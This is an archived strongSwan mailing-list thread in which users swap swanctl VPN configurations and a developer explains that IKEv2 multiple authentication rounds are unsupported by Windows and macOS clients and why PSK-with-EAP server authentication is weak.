[strongSwan] Multiple Authentication Rounds

Discussion:

Christian Salway

2018-07-17 16:05:33 UTC

Hello,

To quote your page [1] "With IKEv2 it is possible to use multiple authentication rounds", could this be PSK and eap-mschapv2 and do you have a configuration that would match that method? My current configuration looks like the below.

The clients are OSX and Windows native clients so I am curious if it will work.

connections {
radius {
version = 2
send_cert = always
encap = yes
pools = pool1
unique = replace
proposals = aes256-sha256-prfsha256-ecp256-modp2048
local {
# the id must be contained in the certificate, either as subject or as subjectAltName.
id = ${FQDN}
certs = cert.pem
}
remote {
auth = eap-radius
eap_id = %any
}
children {
child_sa_1 {
#esp_proposals =
local_ts = ${LOCALCIDR}
}
}
}
}

[1] https://wiki.strongswan.org/projects/strongswan/wiki/IntroductiontostrongSwan#Authentication-Basics <https://wiki.strongswan.org/projects/strongswan/wiki/IntroductiontostrongSwan#Authentication-Basics>

Kind regards,

Christian Salway
IT Consultant - Naimuri

T: +44 7463 331432
E: ***@naimuri.com
A: Naimuri Ltd, Capstan House, Manchester M50 2UW

Emanuil Hristov

2018-07-17 18:29:58 UTC

Permalink

Hello there,
i don't know about macos client. but surely windows native client will not
work.
here is example configuration psk + eap-mschapv2 with radius
this works with ios native client.
---
vpn-pskeap {
local_addrs = $$locaip

local {
auth = psk
id = $$leftid
}

remote {
auth = eap-radius
}

children {
updown = /usr/lib/ipsec/_updown iptables
esp_proposals =
aes128-aes192-aes256-sha1-sha256-sha384-sha512-ecp256-ecp384-ecp521-modp2048-modp3072-modp4096-modp1024
dpd_action = clear
close_action = clear
ike_lifetime = 45m
ipcomp = yes
vpn-pskeap {
local_ts = 0.0.0.0/0
}
}

version = 2
proposals =
aes128-aes192-aes256-sha1-sha256-sha384-sha512-ecp256-ecp384-ecp521-modp2048-modp3072-modp4096-modp1024
mobike = yes
fragmentation = yes
encap = yes
dpd_timeout = 60
dpd_delay = 25
unique = never
pools = radius
}

Post by Christian Salway
Hello,
To quote your page [1] "With IKEv2 it is possible to use multiple
authentication rounds", could this be PSK and eap-mschapv2 and do you have
a configuration that would match that method? My current configuration
looks like the below.
The clients are OSX and Windows native clients so I am curious if it will work.
connections {
radius {
version = 2
send_cert = always
encap = yes
pools = pool1
unique = replace
proposals = aes256-sha256-prfsha256-ecp256-modp2048
local {
# the id must be contained in the certificate, either as subject or as subjectAltName.
id = ${FQDN}
certs = cert.pem
}
remote {
auth = eap-radius
eap_id = %any
}
children {
child_sa_1 {
#esp_proposals =
local_ts = ${LOCALCIDR}
}
}
}
}
[1] https://wiki.strongswan.org/projects/strongswan/wiki/
IntroductiontostrongSwan#Authentication-Basics
Kind regards,
*Christian Salway*
IT Consultant - *Naimuri*
T: +44 7463 331432
A: Naimuri Ltd, Capstan House, Manchester M50 2UW

Christian Salway

2018-07-17 21:09:53 UTC

Permalink

Mmm ok, thanks. I canât see that being configured for OSX either.

Post by Emanuil Hristov
Hello there,
i don't know about macos client. but surely windows native client will not work.
here is example configuration psk + eap-mschapv2 with radius
this works with ios native client.
---
vpn-pskeap {
local_addrs = $$locaip
local {
auth = psk
id = $$leftid
}
remote {
auth = eap-radius
}
children {
updown = /usr/lib/ipsec/_updown iptables
esp_proposals = aes128-aes192-aes256-sha1-sha256-sha384-sha512-ecp256-ecp384-ecp521-modp2048-modp3072-modp4096-modp1024
dpd_action = clear
close_action = clear
ike_lifetime = 45m
ipcomp = yes
vpn-pskeap {
local_ts = 0.0.0.0/0 <http://0.0.0.0/0>
}
}
version = 2
proposals = aes128-aes192-aes256-sha1-sha256-sha384-sha512-ecp256-ecp384-ecp521-modp2048-modp3072-modp4096-modp1024
mobike = yes
fragmentation = yes
encap = yes
dpd_timeout = 60
dpd_delay = 25
unique = never
pools = radius
}
Hello,
To quote your page [1] "With IKEv2 it is possible to use multiple authentication rounds", could this be PSK and eap-mschapv2 and do you have a configuration that would match that method? My current configuration looks like the below.
The clients are OSX and Windows native clients so I am curious if it will work.
connections {
radius {
version = 2
send_cert = always
encap = yes
pools = pool1
unique = replace
proposals = aes256-sha256-prfsha256-ecp256-modp2048
local {
# the id must be contained in the certificate, either as subject or as subjectAltName.
id = ${FQDN}
certs = cert.pem
}
remote {
auth = eap-radius
eap_id = %any
}
children {
child_sa_1 {
#esp_proposals =
local_ts = ${LOCALCIDR}
}
}
}
}
[1] https://wiki.strongswan.org/projects/strongswan/wiki/IntroductiontostrongSwan#Authentication-Basics <https://wiki.strongswan.org/projects/strongswan/wiki/IntroductiontostrongSwan#Authentication-Basics>
Kind regards,
Christian Salway
IT Consultant - Naimuri
T: +44 7463 331432
A: Naimuri Ltd, Capstan House, Manchester M50 2UW

Tobias Brunner

2018-07-18 13:56:24 UTC

Permalink

Hi Christian,

Post by Christian Salway
To quote your page [1] "With IKEv2 it is possible to use multiple
authentication rounds"

This refers to using multiple authentication rounds per RFC 4739 [1].
There aren't that many implementations that support it (i.e. neither
Windows, nor macOS does).

Post by Christian Salway
could this be PSK and eap-mschapv2

Theoretically yes, but combining PSK with EAP isn't strictly compliant
with RFC 7296, according to which [2] the server has to be authenticated
with a pubkey based authentication. The problem is that using a shared
PSK to authenticate the server allows active attackers that know it - if
the PSK is weak they could even find it by connecting to the server and
then attacking the AUTH payload offline - to impersonate the server and
get potentially weak EAP password hashes from clients.

By the way, using PSK authentication for the server and EAP
authentication for the client (like Emanuil does) is not using multiple
authentication rounds (it just uses a PSK instead of a certificate to
authenticate the server). With multiple authentication rounds the first
round would authenticate both client and server with a PSK and then the
EAP authentication would follow (but that doesn't really improve the
overall security, in particular if the same PSK is used for client and
server or the client PSKs are weak). Multiple authentication rounds are
more intended e.g. to first authenticate the client device with a
machine certificate (and the server with its certificate) and then do a
user authentication based on EAP in the second round.

Post by Christian Salway
The clients are OSX and Windows native clients so I am curious if it will work.

No, as mentioned they don't support multiple IKEv2 authentication rounds.

Regards,
Tobias

[1] https://tools.ietf.org/html/rfc4739
[2] https://tools.ietf.org/html/rfc7296#section-2.16

Continue reading on narkive:

Search results for '[strongSwan] Multiple Authentication Rounds' (Questions and Answers)

replies

can i get question answer of asp.net ?

started 2006-10-11 00:02:47 UTC

software

replies

A question about military language.?

started 2011-12-16 08:43:51 UTC

military

replies

Do they have a yahoo Answers where you live?